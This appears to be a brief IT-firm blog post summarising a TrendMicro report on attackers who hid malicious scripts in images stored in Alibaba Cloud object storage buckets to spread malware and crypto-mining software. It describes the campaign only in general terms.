Do you know what questions to ask when you're looking for an IT firm? We're here to help. Get the free guide delivered right to your inbox:
TrendMicro has identified a malicious campaign using the object storage service (OSS) of Alibaba Cloud (also known as Aliyun) for malware distribution and illicit cryptocurrency-mining activities. OSS is a service that allows Alibaba Cloud customers to store data like web application images and backup information in the cloud.
The investigation into this campaign began on March 13th of this year, when people were alerted by deep web users that a group distributing a malicious shell script was being distributed inside OSS buckets in Alibaba Cloud. The bad actors uploaded over 100MB of malicious code and images (appearing as images used in computer games) to the OSS buckets, which contained over 10,000 files at the time of removal.
The initial infection vector for these attackers seems to be via online advertisement network ads delivered via a watering hole attack campaign. The attack was blocked using a Host-based Intrusion Prevention System (HIPS). The attacker then switched tactics and uploaded an additional 1GB of malicious files to the same OSS buckets.
The malicious scripts are distributed using steganography, a technique used to hide data inside image files. The attacker then used steganography to embed their malicious scripts into the picture files they uploaded to the OSS buckets. The steganography is done by adding an encrypted portion (that contains the malicious code) to a larger image file. Once decrypted, the script then performs its actions like connecting to C&C servers for downloading additional malware or installing cryptocurrency-mining malware.